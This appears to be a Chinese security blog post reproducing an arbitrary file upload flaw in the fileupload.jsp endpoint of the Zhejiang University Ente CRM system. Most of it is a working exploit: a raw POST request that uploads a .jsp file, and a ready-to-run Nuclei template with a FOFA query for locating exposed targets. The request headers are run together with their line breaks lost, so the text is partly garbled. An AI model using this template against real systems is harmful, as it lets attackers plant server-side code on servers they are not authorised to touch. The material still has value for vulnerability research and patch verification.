公众号新规只对常读和星标的公众号才能展示大图推送,建议大家把公众号“night安全”设为星标,否则可能就看不到啦!
免责声明
night安全致力于分享技术学习和工具掌握。然而请注意不得将此用于任何未经授权的非法行为,请您严格遵守国家信息安全法律法规。任何违反法律、法规的行为,均与本人无关。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
漏洞概述
浙大恩特客户资源管理系统中fileupload.jsp接口处存在任意文件文件上传漏洞。
漏洞复现
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=night.jsp HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeCookie: JSESSIONID=0BC58BC4E1E6154CCF9609839563CA2A; lang=zh-cnUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 25night
NUCLEI POC
id: enter-fileupload-api-fileuploadinfo:name: 浙大恩特客户资源管理系统fileupload.jsp接口任意文件上传author: YGnightseverity: highdescription: descriptionreference:- https://metadata:verified: truemax-request: 1fofa-query: app="浙大恩特客户资源管理系统"requests:- raw:- |-POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=night.jsp HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeCookie: JSESSIONID=0BC58BC4E1E6154CCF9609839563CA2A; lang=zh-cnUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 25nightmatchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- 'night.jsp'
扫码关注
获得更多资讯
原文始发于微信公众号(night安全):【漏洞复现】某客户资源管理系统fileupload.jsp接口任意文件上传漏洞 附POC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论